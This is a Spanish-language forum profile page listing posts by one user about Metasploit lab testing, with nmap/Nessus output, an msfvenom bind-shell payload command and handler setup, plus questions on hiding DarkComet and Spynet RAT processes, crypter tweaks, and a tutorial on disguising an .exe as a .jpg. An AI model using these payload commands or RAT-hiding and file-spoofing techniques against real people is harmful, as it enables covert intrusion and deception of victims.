Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - mcr_bkn

Páginas: [1]
1
HOla amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y
meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas
en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener
acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( You are not allowed to view links. Register or Login ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at You are not allowed to view links. Register or Login .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:


You are not allowed to view links. Register or Login


You are not allowed to view links. Register or Login


Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!

2
Amigos, tengo una consulta estoy comenzando con las pruebas de pentest y tengo una duda, para comenzar varios tutos recomiendan win xp sp2 pero sera recomendable empezar a la fecha con win xp sp3??? y si alguien tiene las ISO que pueda compartir para descargarlas, estas deben tener alguna configuraciòn en especial??

3
Estimado amigos, quería hacer una consulta a ver si me pueden ayudar. Siempre he tenido problemas con los RAT (Spynet y Darkcomet) en el sentido cuando el remoto lo ejecuta 2 o 3 veces... tengo que ir a administrador de tareas y cerrar un server para que pueda entrar a windows, llegue a la conclusión (ratifiquen si estoy en lo cierto), que escribe en el mismo registro de windows la veces que se ejecuta y esto causa varios problemas (ver fotos adjuntas). A ver si me pueden ayudar a solucionar esto, tenia pensado en agregarle al crypter (realizado en vb6) un modulo que verifique si esta escrito en el registro no ejecute el server, googleando encontre esto: You are not allowed to view links. Register or Login publicado por karcrack, pero no logro hacerlo funcionar para lo que yo quiero... bueno eso... espero puedan ayudarme y de ante mano muchas gracias!!!



You are not allowed to view links. Register or Login



You are not allowed to view links. Register or Login

4
Hola amigos del foro, espero puedan ayudarme. Hce poco me compre un pc nuevo :D y a la sorpresa de querer instalarle otro SO (backtrack5) me encontre con la sorpresa que no se podia. Investigue y me encontre q los nuavos pc (con windows 8) tiene UEFI boot, googleando encontre que ubuntu 12.10 es compatible con UEFI, pero yo queria probar backtrack 5. No he encontrado nada concreto a ver si alguien que le haya pasado lo mismo pueda ayudarme.

Saludos!!!

5
Tutoriales y Manuales de Malwares / Spofear .exe por .jpg por McR
« en: Enero 03, 2013, 12:53:38 am »
Estimados amigos, alomejor un tema un poco repetitivo pero le comparto un video que hice hace un tiempo (para principiantes) y lo queria compartir aca en underc0de!!! :) bueno este método tiene mi estampa pero sacando ideas de varios lados...  bueno acá esta el link...

Link: You are not allowed to view links. Register or Login

Pass: mcr_hack


Nota: Les aconsejo mejorar la configurar del Sfx Compiler ya que la q esta en el vídeo creara una carpeta en C: hay una opción para guardar los archivos en la carpeta Temp, no lo quise hacer de nuevo ya q me dio un poco de flojera jejejeje... Bueno es mi primer vídeo tutorial espero les sirva Saludos!!!

6
Dudas y pedidos generales / [SOLUCIONADO] Ocultar troyano adm. de tarea
« en: Diciembre 04, 2012, 04:01:29 am »
Estimados amigos, probando con darkcomet 5.3.1 desde mi pc escritorio, me di cuenta que en el administrador de tareas aparece el troyano (en aplicaciones y procesos) quiero saber si el RAT tiene una opcion para ocultarlo o si esto depende del crypter... a ver si me pueden ayudar..!!! Saludos...

7
Presentaciones / Saludos!
« en: Noviembre 02, 2012, 03:06:00 pm »
Amigos mios, un saludos a todos los del foro, me gusta todo lo q tiene q ver con RAT y moddeaer crypter... vengo a aprender de los usuarios y ademas aportar los conocimientos que he adquirido hasta el momento, espero tener una buena acogida...


Páginas: [1]